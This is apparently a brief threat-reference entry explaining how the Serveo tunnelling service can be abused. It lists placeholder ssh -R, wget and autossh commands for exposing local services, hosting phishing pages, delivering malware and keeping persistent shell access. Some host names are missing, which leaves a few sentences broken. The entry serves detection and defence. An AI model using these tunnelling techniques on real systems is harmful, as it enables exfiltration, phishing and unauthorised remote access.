Serveo is an online free alternate to ngrok. Which can be used by the insiders as well as threat actors to expose local systems, services over the internet for data exfiltrations, downloading malicious softwares as well as hosting phishing pages.
The command creates a tunnel via serveo to the local port provided in the command. This can be a local service or a web server running locally.
ssh -R <PORT>:localhost:<PORT>
Threat actors can host malicious binaries on the local system and expose it via and have those downloaded on the compromised host.
wget *
Threat actors can host phishing sites locally and can expose them via to compromise users.
ssh -R <PORT>:localhost:<PORT>
Threat actors enabling persistence on the compromised host to ensure system automatically gets connected to the and can also provide shell access by exposing SSH/RDP etc.
autossh -M 0 -R <PORT>:localhost:<PORT>